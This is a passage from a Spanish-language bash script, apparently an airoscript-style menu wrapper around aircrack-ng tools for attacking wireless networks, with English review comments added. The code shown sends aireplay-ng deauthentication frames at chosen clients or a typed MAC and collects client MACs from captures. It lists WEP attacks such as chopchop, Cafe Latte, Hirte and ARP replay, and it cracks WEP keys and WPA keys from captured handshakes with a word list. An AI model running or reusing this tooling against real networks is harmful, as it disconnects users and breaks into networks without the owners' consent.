      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# After an access point has been selected, ask whether a client should be
# selected too; repeats until a valid number is typed.
# Choices: 1 -> askclientsel
#          2 -> nothing
#          3 -> Host_ssidinput, then this same question again if it succeeded
# Globals: yn (written with the raw answer).
choosetarget() {
  while :; do
    clear
    printf '%s\n' \
      "¿SELECCIONAR UN CLIENTE?" \
      " " \
      " 1) Si " \
      " 2) No " \
      " 3) Corregir el SSID Primero " \
      " "
    printf '%s' " #> "
    read yn
    case $yn in
      1) askclientsel; break ;;
      2) break ;;
      3) Host_ssidinput && choosetarget; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Ask which station the deauthentication should be aimed at; repeats until a
# valid number is typed.
# Choices: 1 -> deauthall, 2 -> deauthfake, 3 -> deauthclient,
#          4 -> inputmactodeauth (MAC typed by hand).
# Globals: yn (written with the raw answer).
choosedeauth() {
  while :; do
    clear
    printf '%s\n' \
      "¿A QUIÉN DESAUTENTICAR?" \
      " " \
      " 1) A todos " \
      " 2) A mí mismo " \
      " 3) Al cliente seleccionado " \
      " 4) A otra dirección MAC " \
      " "
    printf '%s' " #> "
    read yn
    case $yn in
      1) deauthall; break ;;
      2) deauthfake; break ;;
      3) deauthclient; break ;;
      4) inputmactodeauth; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Prompt for a station MAC address and start, in a background xterm, an
# aireplay-ng deauthentication run against that station on the selected AP.
# Globals read:    HOLD, TOPRIGHT, Host_SSID, Host_MAC, DEAUTHTIME, WIFI
# Globals written: MANUAL_MAC2
function inputmactodeauth {
echo -n "Teclea la MAC a desautenticar del AP >"
# NOTE(review): the answer is not checked to be a MAC address and is expanded
# unquoted below, so spaces in it become extra aireplay-ng arguments.
read MANUAL_MAC2
# $HOLD and $TOPRIGHT are expanded unquoted on purpose so that each splits
# into separate xterm arguments; $HOLD is not assigned in this part of the
# file. NOTE(review): if either expands to a word xterm does not recognise,
# xterm prints its usage text instead of opening the window.
# The trailing & returns to the menu without waiting for the window.
xterm $HOLD $TOPRIGHT -bg "#000000" -fg "#99CCFF" -title "Desautenticando a $MANUAL_MAC2 de $Host_SSID" -e aireplay-ng --deauth $DEAUTHTIME -a $Host_MAC -c $MANUAL_MAC2 $WIFI &
}
# WEP menu: list the available methods and dispatch to the chosen one;
# repeats until a valid number is typed. Choice 13 returns to the caller
# without running anything.
# Globals: yn (written with the raw answer).
attackwep() {
  while :; do
    clear
    printf '%s\n' \
      "ATAQUES SIN CLIENTES" \
      " " \
      " 1) Falsa auth => Automatica " \
      " 2) Falsa auth => Interactiva " \
      " 3) Fragmentation " \
      " 4) Chopchop " \
      " 5) Cafe Latte " \
      " 6) Hirte " \
      " " \
      "ATAQUES USANDO UN CLIENTE" \
      " " \
      " 7) ARP replay => Automatico " \
      " 8) ARP replay => Interactivo " \
      " 9) Fragmentation " \
      " 10) Frag. attack con cliente " \
      " 11) Chopchop " \
      " " \
      "INYECCIÓN SI SE GENERA EL XOR" \
      " " \
      " 12) ARP inject desde xor (PSK) " \
      " 13) Volver al menu Principal " \
      " "
    printf '%s' " #> "
    read yn
    printf '\n'
    case $yn in
      1) attack; break ;;
      2) fakeinteractiveattack; break ;;
      3) fragnoclient; break ;;
      4) chopchopattack; break ;;
      5) cafelatteattack; break ;;
      6) hirteattack; break ;;
      7) attackclient; break ;;
      8) interactiveattack; break ;;
      9) fragmentationattack; break ;;
      10) fragmentationattackclient; break ;;
      11) chopchopattackclient; break ;;
      12) pskarp; break ;;
      13) break ;;
      *) echo "Opción desconocida. Elije de nuevo" ;;
    esac
  done
  clear
}
# Shown when the selected network is open: display a notice for three
# seconds and clear the screen. Nothing else is run.
attackopn() {
  clear
  printf '%s\n' \
    " " \
    " La red seleccionada es abierta " \
    ""
  sleep 3
  clear
}
# Shown when the selected network uses a security type the script has no
# handler for: display the type for three seconds and clear the screen.
# Globals: Host_ENC (read).
attackunknown() {
  clear
  printf '%s\n' \
    " " \
    " La red seleccionada posee una " \
    " seguridad no implementada: $Host_ENC "
  sleep 3
  clear
}
# Ask where the client MAC should come from; repeats until a valid number is
# typed.
# Choices: 1 -> listclients fromtarjetap   (clients seen on the selected AP)
#          2 -> listclients fromallaps     (clients seen on any AP)
#          3 -> clientdetectandchoose
#          4 -> clientinput                (MAC typed by hand)
# Globals: yn (written with the raw answer).
askclientsel() {
  while :; do
    clear
    printf '%s\n' \
      "SELECCIONA EL CLIENTE" \
      " " \
      " 1) Clientes detectados del AP objetivo" \
      " 2) Clientes detectados de todos los APs" \
      " 3) Realizar desaut. masiva al AP objetivo + redetectar sus clientes" \
      " 4) Introducir manualmente MAC de un cliente" \
      " "
    printf '%s' " #> "
    read yn
    printf '\n'
    case $yn in
      1) listclients fromtarjetap; break ;;
      2) listclients fromallaps; break ;;
      3) clientdetectandchoose; break ;;
      4) clientinput; break ;;
      *) echo "Opción desconocida. Elige de nuevo" ;;
    esac
  done
  clear
}
# Prompt for a client MAC address and store the typed line in Client_MAC.
# The value is stored as typed; no format check is done here.
# Globals: Client_MAC (written).
clientinput() {
  clear
  printf '%s\n' " "
  printf '%s' " Teclea la mac del cliente >"
  read Client_MAC
  # Only resets this function's own positional parameters.
  set -- ${Client_MAC}
}
# Build a list of client rows from a capture CSV and let the user pick one;
# the first comma-separated piece of the picked entry becomes Client_MAC.
# Arguments: $1 - source of the list: fromtarjetap, fromallaps or
#                 fromclientdetection (any other value leaves HOST untouched).
# Globals read:    DUMP_PATH, Host_MAC
# Globals written: HOST, CLIENT, Client_MAC (exported)
function listclients {
case $1 in
fromtarjetap )
echo "Listando clientes del AP objetivo..."
# First whitespace-separated field of every row of dump-01.csv that mentions
# the AP's MAC, minus rows starting with the AP's own MAC or 00:00:00:00.
# NOTE(review): $Host_MAC is used unquoted as a grep pattern; an empty value
# changes how the command line is parsed.
HOST=`cat $DUMP_PATH/dump-01.csv | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -v $Host_MAC`;;
fromallaps )
echo "Listando clientes de todos los APs detectads..."
# Same, for every row matching the pattern "0.:..:..:..:.." (the dots are
# regex wildcards).
HOST=`cat $DUMP_PATH/dump-01.csv | grep -a "0.:..:..:..:.." | awk '{ print $1 }'| grep -a -v 00:00:00:00`;;
fromclientdetection )
echo "Listando clientes del AP objetivo despues de una desautenticación masiva..."
# Same as the first case, but read from the per-AP capture file.
HOST=`cat $DUMP_PATH/$Host_MAC-01.csv | grep -a $Host_MAC | awk '{ print $1 }'| grep -a -v 00:00:00:00| grep -a -v $Host_MAC`;;
esac
clear
echo "SELECCIONA CLIENTE"
echo ""
# Interactive numbered prompt over the word-split list; the loop leaves after
# the first answer, so an out-of-range answer yields an empty Client_MAC.
select CLIENT in $HOST;
do
# Keep only the text before the first comma of the chosen entry.
export Client_MAC=` echo $CLIENT | awk '{
split($1, info, "," )
print info[1] }' `
break;
done
clear
}
# Reset the wireless card: stop running capture/injection tools, take the
# monitor interface down, eject and re-insert the card, start monitor mode
# again and return to the options menu.
# Globals read: WIFI, WIFI2, CARDCTL
function cleanup {
# SIGKILL to every aireplay-ng and airodump-ng process on the system, run in
# the background; only stdout is silenced.
killall -9 aireplay-ng airodump-ng > /dev/null &
ifconfig $WIFI down
airmon-ng stop $WIFI
clear
sleep 2
# $CARDCTL is the card-control binary configured at the top of the file.
$CARDCTL eject
sleep 2
$CARDCTL insert
# Monitor mode is restarted on the originally selected interface (WIFI2),
# while the two commands after it act on WIFI.
airmon-ng start $WIFI2
ifconfig $WIFI up
iwconfig $WIFI
optionmenu
}
# Clear the screen, print the interface summary (info) and, when an access
# point has been selected, print its details as well.
# Globals read:    Host_MAC, Host_SSID, Host_ENC, Host_MAC_MODEL, Client_MAC
# Globals written: Host_CHAN, Host_SPEED (all spaces removed)
target() {
  clear
  info
  # Nothing selected yet: stop after the interface summary.
  [[ -z "$Host_MAC" ]] && return
  Host_CHAN=$(echo $Host_CHAN | tr -d " ")
  Host_SPEED=$(echo $Host_SPEED | tr -d " ")
  printf '%s\n' \
    "INFO AP OBJETIVO" \
    "" \
    " SSID = $Host_SSID /$Host_ENC" \
    " Canal = $Host_CHAN" \
    " Velocidad = $Host_SPEED Mbps" \
    " MAC del AP = $Host_MAC $Host_MAC_MODEL" \
    " MAC de cliente = $Client_MAC" \
    ""
}
# Run aircrack-ng in WEP mode (-a 1) on the capture file of the selected AP,
# save everything it prints to <DUMP_PATH>/<Host_MAC>.key, and set KEY to the
# fourth field of the line containing "KEY" in that file (empty if none).
# Globals read: Host_MAC, DUMP_PATH    Globals written: KEY
# Files: the .key file is overwritten on every call (stdout and stderr).
configure() {
  aircrack-ng -a 1 -b $Host_MAC -s -0 -z $DUMP_PATH/$Host_MAC-01.cap \
    &> $DUMP_PATH/$Host_MAC.key
  KEY=$(cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }')
}
# Run aircrack-ng in WPA mode (-a 2) on the capture file of the selected AP
# with the word list named by $WORDLIST, save everything it prints to
# <DUMP_PATH>/<Host_MAC>.key, and set KEY to the fourth field of the line
# containing "KEY" in that file (empty if none).
# Globals read: Host_MAC, DUMP_PATH, WORDLIST    Globals written: KEY
# NOTE(review): WORDLIST is not assigned in this part of the file (the
# configuration section defines WORDLIST_PATH); an empty value leaves -w
# without an argument.
wpaconfigure() {
  aircrack-ng -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST \
    &> $DUMP_PATH/$Host_MAC.key
  KEY=$(cat $DUMP_PATH/$Host_MAC.key | grep KEY | awk '{ print $4 }')
}
# Pick the key-recovery routine for the selected network: crack when the
# encryption is WEP, wpacrack for anything else.
# Globals: Host_ENC (read).
# $Host_ENC is deliberately left unquoted: Parseforap fills it from a field
# split on commas only, and word splitting here strips any surrounding
# spaces before the comparison. An empty or multi-word value makes the test
# fail with an error message and falls through to wpacrack.
witchcrack() {
  [ $Host_ENC = "WEP" ] && {
    crack
    return
  }
  wpacrack
}
function witchattack {
if [ $Host_ENC = "WEP" ]
then
monitor_interface2
attackwep
elif [ $Host_ENC = "WPA2" ]
then
monitor_interface2
wpahandshake
elif [ $Host_ENC = "WPA&q